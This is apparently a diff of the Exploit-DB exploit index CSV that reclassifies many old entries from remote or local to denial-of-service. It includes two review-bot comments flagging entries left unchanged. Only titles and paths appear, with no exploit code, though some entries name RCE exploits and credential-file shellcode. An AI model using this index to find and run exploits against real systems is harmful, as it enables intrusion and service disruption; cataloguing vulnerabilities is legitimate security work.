 20002,platforms/hp-ux/local/20002.txt,"HP-UX 10.20/11.0 SNMPD File Permission Vulnerabilities",2000-06-07,loveyou,hp-ux,local,0
 20003,platforms/solaris/local/20003.txt,"Intel Corporation Shiva Access Manager 5.0 Solaris World Readable LDAP Password",2000-06-06,"Blaise St. Laurent",solaris,local,0
 20004,platforms/linux/local/20004.c,"Stelian Pop dump 0.4 restore Buffer Overflow Vulnerability",2000-06-07,"Stan Bubrouski",linux,local,0
-20005,platforms/windows/remote/20005.c,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,remote,0
-20006,platforms/windows/remote/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,remote,0
+20005,platforms/windows/dos/20005.c,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (1)",2000-06-08,"Renaud Deraison",windows,dos,0
+20006,platforms/windows/dos/20006.nasl,"Windows NT 4.0 - Remote Registry Request DoS Vulnerability (2)",2000-06-08,"Renaud Deraison",windows,dos,0
 20007,platforms/cgi/remote/20007.c,"3R Soft MailStudio 2000 2.0 userreg.cgi Arbitrary Command Execution",2000-04-24,fygrave,cgi,remote,0
 20008,platforms/cgi/remote/20008.txt,"3R Soft MailStudio 2000 2.0 - Arbitrary File Access",2000-06-09,s0ftpr0ject,cgi,remote,0
 20009,platforms/linux/remote/20009.py,"atmail email server appliance 6.4 - Stored XSS - CSRF - rce",2012-07-21,muts,linux,remote,0
@@ -17361,7 +17361,7 @@ id,file,description,date,author,platform,type,port
 20012,platforms/windows/local/20012.txt,"Computer Associates eTrust Intrusion Detection 1.4.1.13 - Weak Encryption Vulnerability",2000-06-07,Phate.net,windows,local,0
 20013,platforms/linux/local/20013.c,"Sam Lantinga splitvt 1.6.3 - Buffer Overflow Vulnerability",2000-06-01,Syzop,linux,local,0
 20014,platforms/solaris/local/20014.c,"Solaris 2.5/2.6/7.0/8 ufsrestore Buffer Overflow Vulnerability",2000-06-14,"Job de Haas of ITSX",solaris,local,0
-20015,platforms/windows/remote/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 DoS Vulnerability",2000-07-15,"Ussr Labs",windows,remote,0
+20015,platforms/windows/dos/20015.txt,"AnalogX SimpleServer:WWW 1.0.5 - DoS Vulnerability",2000-07-15,"Ussr Labs",windows,dos,0
 20016,platforms/windows/dos/20016.py,"Shadow Op Software Dragon Server 1.0/2.0 - Multiple DoS",2000-06-16,Prizm,windows,dos,0
 20017,platforms/windows/dos/20017.py,"Max Feoktistov Small HTTP server 1.212 - Buffer Overflow",2000-06-16,"Ussr Labs",windows,dos,0
 20018,platforms/solaris/local/20018.txt,"Veritas Software Volume Manager 3.0.2/3.0.3/3.0.4 File Permission Vulnerability",2000-06-16,"Dixie Flatline",solaris,local,0
@@ -17393,7 +17393,7 @@ id,file,description,date,author,platform,type,port
 20045,platforms/linux/local/20045.c,"X 11.0/3.3.3/3.3.4/3.3.5/3.3.6/4.0 libX11 _XAsyncReply() Stack Corruption",2000-06-19,"Chris Evans",linux,local,0
 20046,platforms/unix/remote/20046.txt,"Netscape Professional Services FTP Server (LDAP Aware) 1.3.6 FTP Server Vulnerability",2000-06-21,"Michael Zalewski",unix,remote,0
 20048,platforms/windows/remote/20048.txt,"Microsoft Windows 2000 - Remote CPU-overload Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
-20047,platforms/windows/remote/20047.txt,"Microsoft Windows 2000 Telnet Server DoS Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
+20047,platforms/windows/dos/20047.txt,"Microsoft Windows 2000 - Telnet Server DoS Vulnerability",2000-06-30,"SecureXpert Labs",windows,dos,0
 20049,platforms/windows/remote/20049.txt,"Check Point Software Firewall-1 4.0/1.4.1 Resource Exhaustion Vulnerability",2000-06-30,"SecureXpert Labs",windows,remote,0
 20050,platforms/hardware/dos/20050.c,"Check Point Software Firewall-1 3.0/1.4.0/1.4.1 Spoofed Source Denial of Service",2000-07-05,lore,hardware,dos,0
 20051,platforms/windows/dos/20051.c,"Sybergen SyGate 2.0/3.11 - Denial of Service Vulnerability",2000-06-30,"Marc of eEye",windows,dos,0
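Review bot: The reclassification in this hunk is applied inconsistently: 20047 (Telnet Server DoS) moves to `windows,dos`, but the adjacent 20048 `Microsoft Windows 2000 - Remote CPU-overload Vulnerability` and 20049 `Check Point Software Firewall-1 4.0/1.4.1 Resource Exhaustion Vulnerability`, from the same author and date, stay `windows,remote`. CPU overload and resource exhaustion are denial-of-service outcomes by the same description-based criterion that moved 20047, so those two lines should also have their path segment changed from `remote` to `dos` and their type column set to `dos` (with the matching file moves). If leaving them is deliberate — for instance because the advisory files describe more than a DoS — record the rule used, otherwise a later cleanup pass is likely to flip them anyway.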
@@ -17433,7 +17433,7 @@ id,file,description,date,author,platform,type,port
 20087,platforms/php/webapps/20087.py,"Zabbix <= 2.0.1 - Session Extractor (0day)",2012-07-24,muts,php,webapps,0
 20088,platforms/linux/remote/20088.py,"Symantec Web Gateway 5.0.3.18 - pbcontrol.php ROOT RCE Exploit",2012-07-24,muts,linux,remote,0
 20089,platforms/windows/remote/20089.txt,"Microsoft IIS 4.0/5.0 Source Fragment Disclosure Vulnerability",2000-07-17,"Zuo Lei",windows,remote,0
-20090,platforms/hardware/remote/20090.txt,"HP JetDirect J3111A Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,remote,0
+20090,platforms/hardware/dos/20090.txt,"HP JetDirect J3111A - Invalid FTP Command DoS Vulnerability",2000-07-19,"Peter Grundl",hardware,dos,0
 20091,platforms/multiple/remote/20091.txt,"Stalker Communigate Pro 3.2.4 - Arbitrary File Read Vulnerability",2000-04-03,S21Sec,multiple,remote,0
 20092,platforms/cgi/local/20092.txt,"Sean MacGuire Big Brother 1.0/1.3/1.4 CGI File Creation Vulnerability",2001-06-11,xternal,cgi,local,0
 20093,platforms/linux/local/20093.c,"Stanley T. Shebs Xconq 7.2.2 - Buffer Overflow Vulnerabilities in xconq",2000-06-22,V9,linux,local,0
@@ -17442,7 +17442,7 @@ id,file,description,date,author,platform,type,port
 20096,platforms/windows/remote/20096.txt,"Microsoft IIS 2.0/3.0/4.0/5.0/5.1 Internal IP Address Disclosure Vulnerability",2000-07-13,"Dougal Campbell",windows,remote,0
 20097,platforms/multiple/remote/20097.txt,"IBM Websphere Application Server 2.0./3.0/3.0.2.1 - Showcode Vulnerability",2000-07-24,"Shreeraj Shah",multiple,remote,0
 20098,platforms/multiple/dos/20098.txt,"Netscape Communicator 4.x JPEG-Comment Heap Overwrite Vulnerability",2000-07-25,"Solar Designer",multiple,dos,0
-20099,platforms/windows/remote/20099.c,"AnalogX Proxy 4.0 4 DoS Vulnerability",2000-07-25,wildcoyote,windows,remote,0
+20099,platforms/windows/dos/20099.c,"AnalogX Proxy 4.0 4 - DoS Vulnerability",2000-07-25,wildcoyote,windows,dos,0
 20100,platforms/windows/dos/20100.pl,"WFTPD 2.4.1RC11 STAT/LIST Command DoS",2000-07-21,"Blue Panda",windows,dos,0
 20101,platforms/windows/dos/20101.pl,"WFTPD 2.4.1RC11 REST Command Malformed File Write DoS",2000-07-21,"Blue Panda",windows,dos,0
 20102,platforms/windows/dos/20102.pl,"WFTPD 2.4.1RC11 Unauthenticated MLST Command Remote DoS",2000-07-21,"Blue Panda",windows,dos,0
@@ -17525,7 +17525,7 @@ id,file,description,date,author,platform,type,port
 20189,platforms/unix/local/20189.c,"Libc locale Exploit (1)",2000-09-04,Synnergy.net,unix,local,0
 20190,platforms/unix/local/20190.c,"Libc locale Exploit (2)",2000-09-04,anonymous,unix,local,0
 20191,platforms/bsd/local/20191.c,"Juergen Weigert screen 3.9 User Supplied Format String Vulnerability",2000-09-05,IhaQueR@IRCnet,bsd,local,0
-20192,platforms/unix/local/20192.txt,"LPPlus 3.2.2/3.3 Permissions DoS Vulnerabilities",2000-09-06,"Dixie Flatline",unix,local,0
+20192,platforms/unix/dos/20192.txt,"LPPlus 3.2.2/3.3 - Permissions DoS Vulnerabilities",2000-09-06,"Dixie Flatline",unix,dos,0
 20193,platforms/unix/local/20193.txt,"LPPlus 3.2.2/3.3 dccscan unprivileged read Vulnerability",2000-09-06,"Dixie Flatline",unix,local,0
 20194,platforms/cgi/remote/20194.pl,"CGI Script Center Auction Weaver 1.0.2 - Remote Command Execution Vulnerability",2000-08-30,teleh0r,cgi,remote,0
 20196,platforms/lin_x86/shellcode/20196.c,"Linux x86 - chmod 666 /etc/passwd & /etc/shadow (57 bytes)",2012-08-02,"Jean Pascal Pereira",lin_x86,shellcode,0
@@ -17549,7 +17549,7 @@ id,file,description,date,author,platform,type,port
 20214,platforms/windows/remote/20214.pl,"Check Point Software Firewall-1 3.0/1 4.0 Session Agent Impersonation Vulnerability",1998-09-24,"Andrew Danforth",windows,remote,0
 20215,platforms/multiple/remote/20215.pl,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (1)",2000-08-15,"Nelson Brito",multiple,remote,0
 20216,platforms/multiple/remote/20216.sh,"Check Point Software Firewall-1 3.0/1 4.0/1 4.1 Session Agent Dictionary Attack (2)",2000-10-01,"Gregory Duchemin",multiple,remote,0
-20217,platforms/linux/local/20217.c,"RedHat Linux 6.1 i386 Tmpwatch Recursive Write DoS Vulnerability",2000-09-09,"zenith parsec",linux,local,0
+20217,platforms/linux/dos/20217.c,"RedHat Linux 6.1 i386 - Tmpwatch Recursive Write DoS Vulnerability",2000-09-09,"zenith parsec",linux,dos,0
 20218,platforms/cgi/remote/20218.txt,"YaBB 9.1.2000 - Arbitrary File Read Vulnerability",2000-09-10,pestilence,cgi,remote,0
 20219,platforms/windows/dos/20219.txt,"WebTV for Windows 98/ME DoS Vulnerability",2000-09-12,Smashstack,windows,dos,0
 20220,platforms/linux/remote/20220.txt,"Mandrake 6.1/7.0/7.1 /perl http Directory Disclosure Vulnerability",2000-09-11,anonymous,linux,remote,0
@@ -17557,7 +17557,7 @@ id,file,description,date,author,platform,type,port
 20222,platforms/windows/remote/20222.cpp,"Microsoft Windows 2000 telnet.exe NTLM Authentication Vulnerability",2000-08-14,@stake,windows,remote,0
 20223,platforms/windows/remote/20223.txt,"Sambar Server 4.3/4.4 beta 3 - Search CGI Vulnerability",2000-09-15,dethy,windows,remote,0
 20224,platforms/windows/remote/20224.txt,"CamShot WebCam 2.6 Trial - Remote Buffer Overflow",2000-09-15,SecuriTeam,windows,remote,0
-20225,platforms/windows/remote/20225.pl,"Alt-N MDaemon 3.1.1 DoS Vulnerability",1999-12-01,"Ussr Labs",windows,remote,0
+20225,platforms/windows/dos/20225.pl,"Alt-N MDaemon 3.1.1 - DoS Vulnerability",1999-12-01,"Ussr Labs",windows,dos,0
 20226,platforms/freebsd/dos/20226.c,"FreeBSD Kernel SCTP Remote NULL Ptr Dereference DoS",2012-08-03,"Shaun Colley",freebsd,dos,0
 20542,platforms/windows/local/20542.rb,"globalSCAPE CuteZIP Stack Buffer Overflow",2012-08-15,metasploit,windows,local,0
 20228,platforms/windows/dos/20228.pl,"TYPSoft 0.7 x FTP Server Remote DoS Vulnerability",1999-06-08,dethy,windows,dos,0
@@ -17571,7 +17571,7 @@ id,file,description,date,author,platform,type,port
 20236,platforms/linux/remote/20236.txt,"S.u.S.E. Linux 6.3/6.4 Installed Package Disclosure Vulnerability",2000-09-21,t0maszek,linux,remote,0
 20237,platforms/linux/remote/20237.c,"UoW Pine 4.0.4/4.10/4.21 - _From:_ Field Buffer Overflow Vulnerability",2000-09-23,Arkane,linux,remote,0
 20238,platforms/cgi/remote/20238.txt,"Alabanza Control Panel 3.0 Domain Modification Vulnerability",2000-09-24,"Weihan Leow",cgi,remote,0
-20239,platforms/multiple/remote/20239.txt,"HP OpenView Network Node Manager 6.10 SNMP DoS Vulnerability",2000-09-26,DCIST,multiple,remote,0
+20239,platforms/multiple/dos/20239.txt,"HP OpenView Network Node Manager 6.10 - SNMP DoS Vulnerability",2000-09-26,DCIST,multiple,dos,0
 20240,platforms/windows/remote/20240.txt,"Microsoft Windows Media Player 7 Embedded OCX Control Vulnerability",2000-09-26,"Ussr Labs",windows,remote,0
 20241,platforms/palm_os/local/20241.txt,"Palm OS 3.5.2 Weak Encryption Vulnerability",2000-09-26,@stake,palm_os,local,0
 20242,platforms/cgi/remote/20242.txt,"Unixware 7.0 SCOhelp HTTP Server Format String Vulnerability",2000-09-26,"Juliano Rizzo",cgi,remote,0
@@ -17651,7 +17651,7 @@ id,file,description,date,author,platform,type,port
 20320,platforms/windows/webapps/20320.txt,"Zoho BugTracker Multiple Stored XSS Vulnerabilities",2012-08-07,LiquidWorm,windows,webapps,0
 20321,platforms/windows/remote/20321.rb,"Ubisoft uplay 2.0.3 Active X Control Arbitrary Code Execution",2012-08-08,metasploit,windows,remote,0
 20322,platforms/multiple/remote/20322.html,"Sun HotJava Browser 3 - Arbitrary DOM Access Vulnerability",2000-10-25,"Georgi Guninski",multiple,remote,0
-20323,platforms/hardware/remote/20323.txt,"Cisco IOS 12 Software _?/_ HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,remote,0
+20323,platforms/hardware/dos/20323.txt,"Cisco IOS 12 - Software _?/_ HTTP Request DoS Vulnerability",2000-10-25,"Alberto Solino",hardware,dos,0
 20324,platforms/windows/remote/20324.txt,"iPlanet Certificate Management System 4.2 - Directory Traversal",2000-10-25,CORE-SDI,windows,remote,0
 20325,platforms/windows/remote/20325.txt,"Netscape Directory Server 4.12 - Directory Server Directory Traversal Vulnerability",2000-10-25,CORE-SDI,windows,remote,0
 20326,platforms/unix/local/20326.sh,"ntop 1.x - -i Local Format String Vulnerability",2000-10-18,"Paul Starzetz",unix,local,0
@@ -17660,11 +17660,11 @@ id,file,description,date,author,platform,type,port
 20329,platforms/hp-ux/local/20329.sh,"HP-UX 10.20/11.0 crontab /tmp File Vulnerability",2000-10-20,"Kyong-won Cho",hp-ux,local,0
 20330,platforms/hardware/remote/20330.pl,"Cisco Catalyst 3500 XL Remote Arbitrary Command Execution Vulnerability",2000-10-26,blackangels,hardware,remote,0
 20331,platforms/hardware/remote/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,remote,0
-20332,platforms/hardware/remote/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,remote,0
+20332,platforms/hardware/dos/20332.pl,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)",1998-03-17,Rootshell,hardware,dos,0
 20333,platforms/unix/local/20333.c,"Exim Buffer 1.6.2/1.6.51 - Overflow Vulnerability",1997-07-21,"D. J. Bernstein",unix,local,0
 20334,platforms/windows/remote/20334.java,"CatSoft FTP Serv-U 2.5.x Brute-Force Vulnerability",2000-10-29,Craig,windows,remote,0
 20335,platforms/windows/remote/20335.txt,"Microsoft Indexing Services for Windows 2000/NT 4.0 - (.htw) Cross-Site Scripting Vulnerability",2000-10-28,"Georgi Guninski",windows,remote,0
-20336,platforms/multiple/remote/20336.txt,"Unify eWave ServletExec 3.0 c DoS Vulnerability",2000-10-30,"Foundstone Labs",multiple,remote,0
+20336,platforms/multiple/dos/20336.txt,"Unify eWave ServletExec 3.0 c - DoS Vulnerability",2000-10-30,"Foundstone Labs",multiple,dos,0
 20337,platforms/unix/remote/20337.c,"tcpdump 3.4/3.5 AFS ACL Packet Buffer Overflow Vulnerability",2001-01-02,Zhodiac,unix,remote,0
 20338,platforms/linux/local/20338.c,"SAMBA 2.0.7 SWAT Symlink Vulnerability (1)",2000-11-01,Optyx,linux,local,0
 20339,platforms/linux/local/20339.sh,"SAMBA 2.0.7 SWAT Symlink Vulnerability (2)",2000-11-01,Optyx,linux,local,0
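Review bot: 20332 `Ascend R 4.5 Ci12 - Denial of Service Vulnerability (2)` is moved to `hardware,dos`, but its sibling 20331 `Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)` — same advisory, same author, one day earlier — is left as `hardware,remote` on the context line directly above it. The two halves of one advisory should be classified identically; the matching change is `20331,platforms/hardware/dos/20331.c,"Ascend R 4.5 Ci12 - Denial of Service Vulnerability (1)",1998-03-16,Rootshell,hardware,dos,0`, together with the file move that path implies. Leaving them split means a search by type finds only half of the pair.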
@@ -17727,11 +17727,11 @@ id,file,description,date,author,platform,type,port
 20397,platforms/cgi/remote/20397.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 Path Disclosure Vulnerability",2000-11-10,sozni,cgi,remote,0
 20398,platforms/php/webapps/20398.txt,"MobileCartly 1.0 - Arbitrary File Deletion Vulnerability",2012-08-10,GoLd_M,php,webapps,0
 20399,platforms/windows/remote/20399.html,"Microsoft Indexing Services for Windows 2000 File Verification Vulnerability",2000-11-10,"Georgi Guninski",windows,remote,0
-20400,platforms/cgi/remote/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 DoS Vulnerability",2000-11-10,sozni,cgi,remote,0
+20400,platforms/cgi/dos/20400.txt,"McMurtrey/Whitaker & Associates Cart32 3.0/3.1/3.5 - DoS Vulnerability",2000-11-10,sozni,cgi,dos,0
 21041,platforms/multiple/dos/21041.txt,"Microsoft Internet Explorer 3/4/5_Netscape Communicator 4 IMG Tag DoS Vulnerability",2001-06-19,"John Percival",multiple,dos,0
 20401,platforms/windows/local/20401.txt,"Computer Associates InoculateIT 4.53 Microsoft Exchange Agent Vulnerability",2000-11-10,"Hugo Caye",windows,local,0
 20402,platforms/linux/local/20402.sh,"Linux modutils 2.3.9 modprobe Arbitrary Command Execution Vulnerability",2000-11-12,"Michal Zalewski",linux,local,0
-20403,platforms/windows/remote/20403.txt,"Small HTTP server 2.0 1 Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,remote,0
+20403,platforms/windows/dos/20403.txt,"Small HTTP server 2.0 1 - Non-Existent File DoS Vulnerability",2000-11-14,"403-security team",windows,dos,0
 20404,platforms/beos/remote/20404.txt,"Joe Kloss RobinHood 1.1 - Buffer Overflow Vulnerability",2000-11-14,Vort-fu,beos,remote,0
 20405,platforms/cgi/remote/20405.pl,"DCForum 1-6 - Arbitrary File Disclosure Vulnerability",2000-11-14,steeLe,cgi,remote,0
 20406,platforms/multiple/remote/20406.txt,"RealServer 5.0/6.0/7.0 Memory Contents Disclosure Vulnerability",2000-11-16,CORE-SDI,multiple,remote,0
@@ -17758,7 +17758,7 @@ id,file,description,date,author,platform,type,port
 20429,platforms/jsp/remote/20429.txt,"Caucho Technology Resin 1.2 JSP Source Disclosure Vulnerability",2000-11-23,benjurry,jsp,remote,0
 20430,platforms/cgi/remote/20430.txt,"Info2www 1.0/1.1 CGI Input Handling Vulnerability",1998-03-03,"Niall Smart",cgi,remote,0
 20431,platforms/php/webapps/20431.txt,"Phorum 3.x - Arbitrary File Read Vulnerability",2000-11-24,"Joao Gouveia",php,webapps,0
-20432,platforms/windows/local/20432.txt,"Network Associates WebShield SMTP 4.5 Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,local,0
+20432,platforms/windows/dos/20432.txt,"Network Associates WebShield SMTP 4.5 - Invalid Outgoing Recipient Field DoS Vulnerability",2000-11-23,"Jari Helenius",windows,dos,0
 20433,platforms/cgi/remote/20433.txt,"CGI City CC Whois 1.0 Metacharacter Vulnerability",1999-11-09,"Cody T. - hhp",cgi,remote,0
 20434,platforms/cgi/remote/20434.txt,"Miva htmlscript 2.x - Directory Traversal Vulnerability",1998-01-26,"Dennis Moore",cgi,remote,0
 20435,platforms/cgi/remote/20435.txt,"Apache 0.8.x/1.0.x & NCSA httpd 1.x - test-cgi Directory Listing Vulnerability",1996-04-01,@stake,cgi,remote,0
@@ -17818,7 +17818,7 @@ id,file,description,date,author,platform,type,port
 20491,platforms/multiple/remote/20491.txt,"KTH Kerberos 4 - Arbitrary Proxy Usage Vulnerability",2000-12-08,"Jouko Pynnonen",multiple,remote,0
 20492,platforms/unix/remote/20492.txt,"ssldump 0.9 b1 Format String Vulnerability",2000-12-11,c0ncept,unix,remote,0
 20493,platforms/linux/local/20493.sh,"University of Washington Pico 3.x/4.x File Overwrite Vulnerability",2000-12-11,mat,linux,local,0
-20494,platforms/linux/remote/20494.pl,"RedHat Linux 7.0 Roaring Penguin PPPoE Denial of Service Vulnerability",2000-12-11,dethy,linux,remote,0
+20494,platforms/linux/dos/20494.pl,"RedHat Linux 7.0 - Roaring Penguin PPPoE Denial of Service Vulnerability",2000-12-11,dethy,linux,dos,0
 20495,platforms/unix/remote/20495.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (1)",2000-12-11,CyRaX,unix,remote,0
 20496,platforms/linux/remote/20496.c,"Oops Proxy Server 1.4.22 - Buffer Overflow Vulnerabilities (2)",2000-12-07,diman,linux,remote,0
 20497,platforms/cgi/remote/20497.html,"Leif M. Wright everythingform.cgi 2.0 - Arbitrary Command Execution Vulnerability",2000-12-11,rpc,cgi,remote,0
@@ -17856,7 +17856,7 @@ id,file,description,date,author,platform,type,port
 20532,platforms/sco/dos/20532.txt,"ScreenOS 1.73/2.x Firewall Denial of Service Vulnerability",2001-01-08,Nsfocus,sco,dos,0
 20533,platforms/cgi/remote/20533.txt,"eXtropia bbs_forum.cgi 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-01-07,scott,cgi,remote,0
 20534,platforms/multiple/dos/20534.txt,"WebMaster ConferenceRoom 1.8 Developer Edition DoS Vulnerability",2001-01-10,"Murat - 2",multiple,dos,0
-20535,platforms/linux/local/20535.txt,"ReiserFS 3.5.28 Kernel - DoS & Code Execution Vulnerability",2001-01-09,"Marc Lehmann",linux,local,0
+20535,platforms/linux/dos/20535.txt,"ReiserFS 3.5.28 Kernel - DoS (Possible Code Execution Vulnerability)",2001-01-09,"Marc Lehmann",linux,dos,0
 20536,platforms/linux/dos/20536.java,"ProFTPD 1.2 SIZE Remote Denial of Service Vulnerability",2000-12-20,JeT-Li,linux,dos,0
 20537,platforms/multiple/remote/20537.txt,"Borland/Inprise Interbase 4.0/5.0/6.0 Backdoor Password Vulnerability",2001-01-10,"Frank Schlottmann-Goedde",multiple,remote,0
 20538,platforms/php/webapps/20538.txt,"Basilix Webmail 0.9.7 Incorrect File Permissions Vulnerability",2001-01-11,"Tamer Sahin",php,webapps,0
@@ -17881,8 +17881,8 @@ id,file,description,date,author,platform,type,port
 20558,platforms/multiple/dos/20558.txt,"Apache 1.2 Web Server DoS Vulnerability",1997-12-30,"Michal Zalewski",multiple,dos,0
 20559,platforms/windows/remote/20559.c,"tinyproxy tinyproxy 1.3.2/1.3.3 Heap Overflow Vulnerability",2001-01-17,CyRaX,windows,remote,0
 20560,platforms/unix/local/20560.c,"SSH 1.2.x Secure-RPC Weak Encrypted Authentication Vulnerability",2001-01-16,"Richard Silverman",unix,local,0
-20561,platforms/linux/remote/20561.pl,"Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (1)",1997-06-12,"Frank DENIS",linux,remote,0
-20562,platforms/linux/remote/20562.c,"Dan Bernstein QMail 1.0 3 RCPT Denial of Service Vulnerability (2)",1997-06-12,"Wietse Venema",linux,remote,0
+20561,platforms/linux/dos/20561.pl,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service Vulnerability (1)",1997-06-12,"Frank DENIS",linux,dos,0
+20562,platforms/linux/dos/20562.c,"Dan Bernstein QMail 1.0 3 - RCPT Denial of Service Vulnerability (2)",1997-06-12,"Wietse Venema",linux,dos,0
 20563,platforms/unix/remote/20563.txt,"wu-ftpd 2.4.2/2.5 .0/2.6.0/2.6.1/2.6.2 - FTP Conversion Vulnerability",1999-12-20,suid,unix,remote,0
 20564,platforms/windows/dos/20564.txt,"Microsoft Windows NT 4.0 SNMP-WINS DoS Vulnerability",1997-10-07,CRouland,windows,dos,0
 20565,platforms/hardware/remote/20565.c,"HP JetDirect rev. G.08.x/rev. H.08.x/x.08.x/J3111A LCD Display Modification Vulnerability",1997-12-08,sili,hardware,remote,0
@@ -17910,7 +17910,7 @@ id,file,description,date,author,platform,type,port
 20586,platforms/php/webapps/20586.txt,"Phorum 3.0.7 admin.php3 Unverified Administrative Password Change Vulnerability",2000-01-06,"Max Vision",php,webapps,0
 20587,platforms/php/webapps/20587.txt,"Phorum 3.0.7 violation.php3 - Arbitrary Email Relay Vulnerability",2000-01-01,"Max Vision",php,webapps,0
 20588,platforms/php/webapps/20588.txt,"Phorum 3.0.7 - auth.php3 Backdoor Vulnerabililty",2000-01-06,"Max Vision",php,webapps,0
-20589,platforms/windows/local/20589.c,"eEye Digital Security IRIS 1.0.1 GET Denial of Service Vulnerability",2001-01-21,grazer,windows,local,0
+20589,platforms/windows/dos/20589.c,"eEye Digital Security IRIS 1.0.1 - GET Denial of Service Vulnerability",2001-01-21,grazer,windows,dos,0
 20590,platforms/windows/remote/20590.txt,"Microsoft IIS 3.0/4.0 Upgrade BDIR.HTR Vulnerability",1998-12-25,"rain forest puppy",windows,remote,0
 20591,platforms/multiple/remote/20591.txt,"Netscape Enterprise Server 3.0/4.0 - 'Index' Disclosure Vulnerability",2001-01-24,"Security Research Team",multiple,remote,0
 20592,platforms/jsp/remote/20592.txt,"Oracle 8.1.7 JSP/JSPSQL Remote File Reading Vulnerability",2000-01-22,"Georgi Guninski",jsp,remote,0
@@ -17945,7 +17945,7 @@ id,file,description,date,author,platform,type,port
 20623,platforms/cgi/remote/20623.txt,"carey internets services commerce.cgi 2.0.1 - Directory Traversal Vulnerability",2001-02-12,slipy,cgi,remote,0
 20624,platforms/windows/remote/20624.rb,"Adobe Flash Player 11.3 Font Parsing Code Execution",2012-08-20,metasploit,windows,remote,0
 20625,platforms/multiple/remote/20625.txt,"SilverPlatter WebSPIRS 3.3.1 File Disclosure Vulnerability",2001-02-12,cuctema,multiple,remote,0
-20626,platforms/linux/local/20626.c,"Linux sysctl() Kernel 2.2.x Memory Reading Vulnerability",2001-02-09,"Chris Evans",linux,local,0
+20626,platforms/linux/local/20626.c,"Linux sysctl() Kernel 2.2.x - Memory Reading Vulnerability",2001-02-09,"Chris Evans",linux,local,0
 20627,platforms/php/webapps/20627.py,"IlohaMail Webmail Stored XSS",2012-08-18,"Shai rod",php,webapps,0
 20628,platforms/windows/remote/20628.txt,"his software auktion 1.62 - Directory Traversal Vulnerability",2001-02-12,cuctema,windows,remote,0
 20629,platforms/cgi/remote/20629.txt,"Way-Board 2.0 File Disclosure Vulnerability",2001-02-12,cuctema,cgi,remote,0
@@ -17972,12 +17972,12 @@ id,file,description,date,author,platform,type,port
 20651,platforms/windows/local/20651.txt,"datawizards ftpxq 2.0.93 - Directory Traversal Vulnerability",2001-02-28,joetesta,windows,local,0
 20652,platforms/hardware/remote/20652.txt,"Cisco IOS 11.x/12.0 ILMI SNMP Community String Vulnerability",2001-02-27,pask,hardware,remote,0
 20653,platforms/windows/remote/20653.txt,"SunFTP 1.0 Build 9 Unauthorized File Access Vulnerability",2001-03-02,se00020,windows,remote,0
-20654,platforms/hardware/remote/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 Telnet Administration DoS",2001-02-26,altomo,hardware,remote,0
+20654,platforms/hardware/dos/20654.pl,"APC WEB/SNMP Management Card (9606) Firmware 3.0 - Telnet Administration DoS",2001-02-26,altomo,hardware,dos,0
 20655,platforms/windows/dos/20655.txt,"Orange Software Orange Web Server 2.1 DoS Vulnerability",2001-02-27,slipy,windows,dos,0
-20656,platforms/windows/remote/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service Vulnerability",2001-02-27,slipy,windows,remote,0
+20656,platforms/windows/dos/20656.txt,"Robin Twombly A1 HTTP Server 1.0 - Denial of Service Vulnerability",2001-02-27,slipy,windows,dos,0
 20657,platforms/windows/remote/20657.txt,"robin twombly a1 http server 1.0 - Directory Traversal Vulnerability",2001-02-27,slipy,windows,remote,0
 20658,platforms/unix/local/20658.txt,"Joe Text Editor 2.8 - (.joerc) Arbitrary Command Execution Vulnerability",2001-02-28,"Wkit Security",unix,local,0
-20659,platforms/multiple/remote/20659.txt,"Netwin SurgeFTP 1.0 b Malformed Request Denial of Service Vulnerability",2001-03-01,"the Strumpf Noir Society",multiple,remote,0
+20659,platforms/multiple/dos/20659.txt,"Netwin SurgeFTP 1.0 b - Malformed Request Denial of Service Vulnerability",2001-03-01,"the Strumpf Noir Society",multiple,dos,0
 20660,platforms/unix/remote/20660.txt,"KICQ 1.0 - Remote Arbitrary Command Execution Vulnerability",2001-02-14,"Marc Roessler",unix,remote,0
 20661,platforms/windows/remote/20661.txt,"jarle aase war ftpd 1.67 b04 - Directory Traversal Vulnerability",2001-03-06,se00020,windows,remote,0
 20662,platforms/windows/dos/20662.txt,"WhitSoft SlimServe HTTPD 1.1 Get Denial of Service Vulnerability",2001-02-28,joetesta,windows,dos,0
@@ -18002,7 +18002,7 @@ id,file,description,date,author,platform,type,port
 20679,platforms/unix/local/20679.c,"Rob Malda ASCDC 0.3 - Buffer Overflow Vulnerability (2)",2001-03-08,"the itch",unix,local,0
 20680,platforms/windows/remote/20680.html,"Microsoft Internet Explorer 5.0.1/5.5/6.0 Telnet Client File Overwrite Vulnerability",2001-03-09,"Oliver Friedrichs",windows,remote,0
 20681,platforms/windows/dos/20681.c,"Baltimore Technologies WEBsweeper 4.0 DoS Vulnerability",2001-01-22,honoriak,windows,dos,0
-20682,platforms/windows/remote/20682.txt,"Michael Lamont Savant Web Server 3.0 DoS Vulnerability",2001-03-09,Phiber,windows,remote,0
+20682,platforms/windows/dos/20682.txt,"Michael Lamont Savant Web Server 3.0 - DoS Vulnerability",2001-03-09,Phiber,windows,dos,0
